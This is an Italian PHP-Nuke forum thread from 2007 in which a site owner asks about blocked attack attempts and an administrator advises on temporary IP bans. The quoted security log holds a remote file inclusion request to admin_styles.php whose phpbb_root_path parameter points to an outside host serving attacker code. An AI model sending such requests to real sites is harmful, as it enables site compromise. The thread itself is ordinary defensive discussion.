Argomenti: 1581    Messaggi: 8758   Risposte: 7185      
(Ultime News)------|    Nasce Cleanuke.it supporto ufficiale al cms - (18-06-2011 - 23:04:54 - di matteoiamma)    |------|    Rilasciato Clean Nuke 1.7 - (05-05-2011 - 19:49:43 - di matteoiamma)    |------|    Iamma Multi Blogs: Blogs per gli utenti del nuke - (19-03-2011 - 20:41:08 - di matteoiamma)    |------|    Rilasciato Clean Nuke 1.6 - (13-03-2010 - 20:12:46 - di matteoiamma)    |------|    Nuova Community Italiana: nasce mondophpnuke.com - (11-02-2010 - 22:08:51 - di matteoiamma)    |------|    Rilasciato Clean Nuke 1.5! - (16-12-2009 - 00:44:55 - di matteoiamma)    |------
Regolamento:
Le principali regole da rispettare per poter far parte della community... cosigliamo di visionarle per evitare malintesi.
Script:
Per motivi di sicurezza il sistema blocca l'inserimento di alcuni script per sapere come fare cliccare qui

Webother.com :: Leggi il Topic - Abuse-filter
 FAQ  •  Cerca  •  Lista degli utenti  •  Gruppi utenti  •  Profilo  •  Messaggi Privati  •  Login

Information Abuse-filter

Nuovo Topic Rispondi
Indice del forum » Sicurezza   
Precedente :: Successivo
AutoreMessaggio
Cloud
Affezionato
Affezionato


Registrato: Dec 27, 2006
Messaggi: 46


Oggetto: Abuse-filter Rispondi citando

Da un paio di giorni ricevo delle mail dal sentinel che stanno a dimostrare dei chiari tentativi di attacco al mio sito:
Citazione:
Data e ora: 2007-04-16 22:36:29 CEST GMT +0200
IP bloccato: 80.253.99.162
ID Utente: Visitatore (1)
Motivo: Abuse-Filter
--------------------
User-Agent: libwww-perl/5.805
Query string: www.jrpgworld.it//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://62.129.173.149/img/dog.c?
Stringa GET: www.jrpgworld.it//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://62.129.173.149/img/dog.c?
Stringa POST: www.jrpgworld.it//modules/Forums/admin/admin_styles.php
Rinviato per: none
IP del client: none
Indirizzo remoto: 80.253.99.162
Porta remota: 45397
Metodo Richiesta: GET

Questo è solo il primo di altri cinque e penso che non siano gli ultimi...
Sono tentativi a successione fino a che non trovano una falla nel mio nuke?
Volevo chiedere, è possibile bloccare automaticamente ogni ip che abbia un deteminato user-agent o un determinato testo/stringa?
L'IP varia sempre, ma la destinazione finale a cui tenta di reindirizzare è sempre quella.
Il mio sentinel mi proteggerà per sempre? Crying or Very sad
PS: La mia è la versione 2.5.04, non ancora faccio l'aggiornamento all'ultima versione (2.5.07).



MessaggioInviato:
Mar Apr 17, 2007 12:15 am
Top of PageProfiloMessaggio privatoHomePage
Sniffer
Amministratore
Amministratore


Registrato: Jul 20, 2003
Messaggi: 3218
Località: Verona

Oggetto: Rispondi citando

Si è un attacco tentando di sfruttare una vecchia falla nel modulo forums ma non ti preoccupare quel genere di attacchi vengono bloccati da Sentinel, io ne ricevo parecchi ogni giorno e tra i tanti sfruttano anche quella.

Configura Sentinel per bloccare l'ip temporaneamente un ban permanente non servirebbe a nulla se vengono utilizzati dei proxy e rischi di bloccare futuri ip che non centrano nulla.

ciao ciao




_________________
Non inviatemi pm con richieste di aiuto grazie.
 Su questo forum solo gli utenti
 registrati possono vedere i links!  
 Registrati o fai il login
MessaggioInviato:
Mar Apr 17, 2007 12:37 am
Top of PageProfiloMessaggio privatoHomePage
Cloud
Affezionato
Affezionato


Registrato: Dec 27, 2006
Messaggi: 46


Oggetto: Rispondi citando

Capisco, a sto punto non mi conviene bannare questi IP, tanto lo cambia continuamente!
Comunque grazie Sniffer! Smile



MessaggioInviato:
Mar Apr 17, 2007 9:01 am
Top of PageProfiloMessaggio privatoHomePage
Mostra prima i messaggi di:   
Tutti i fusi orari sono GMT + 2 ore
Nuovo Topic Rispondi
Indice del forum » Sicurezza  

Vai a:  
Key
  Non puoi inserire nuovi Topic in questo forum
Non puoi rispondere ai Topic in questo forum
Non puoi modificare i tuoi messaggi in questo forum
Non puoi cancellare i tuoi messaggi in questo forum
Non puoi votare nei sondaggi in questo forum

Powered by phpBB © 2001, 2005 phpBB Group



http://www.top100italiana.com

 

Tutti i diritti riservati Copyright © 2003-2024